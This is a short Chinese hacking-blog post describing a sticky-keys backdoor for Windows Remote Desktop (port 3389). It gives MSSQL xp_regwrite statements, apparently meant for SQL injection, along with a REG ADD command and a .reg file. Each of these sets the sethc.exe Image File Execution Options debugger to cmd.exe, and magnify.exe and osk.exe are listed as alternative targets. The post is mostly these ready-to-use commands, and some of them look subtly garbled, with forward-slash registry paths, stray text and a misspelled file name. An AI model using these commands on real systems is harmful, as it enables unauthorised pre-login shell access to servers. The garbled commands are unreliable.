3389新思路 's

admin

104946
文章

87
评论

2017年4月29日15:16:04评论313 views字数 885阅读2分57秒阅读模式

摘要

版权所有：BK瞬间群
作者：BK群某饮料1.能修改注册表
2.能访问3389 regedit/s 导入 .reg 文件进注册表（安静模式）

版权所有：BK瞬间群
作者：BK群某饮料

1.能修改注册表
2.能访问3389

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe','debugger','REG_sz','c:/windows/system32/cmd.exe on';--

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe','debugger','REG_sz','';--

REG ADD "HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe" /v debugger /t REG_sz /d "c:/windows/system32/cmd.exe" on /f

Windows Registry Editor Version 5.00  [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethcasd.exe] "debugger"="c://windows//system32//cmd.exe on"

regedit

/s 导入 .reg 文件进注册表（安静模式）

/e 导出注册表文件

例：regedit /e filename.reg HKEY_LOCAL_MACHINE//SYSTEM

magnify.exe

osk.exe

sethc.exe

左青龙
微信扫一扫

右白虎
微信扫一扫

3389新思路 's

Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit

LBS 2.0.313 重要安全更新 [2007-07-03] 's

LBS blog又一注射漏洞含漏洞解析和exp 's

Penetration Testing 渗透测试 (11%) 's

bbsxp 2007[以前版本不知道]一个有意思的漏洞 's

bbsxp 2007斑竹权限注射 's

bbsxp 2007 注射漏洞 's

BBSXP7 mssql版，从注入到拿WEBSHELL 's

LBS 2.0.312 重要安全更新 [2007-06-29] 's

LBS blog sql注射漏洞[All version] 's

发表评论

在线咨询

微信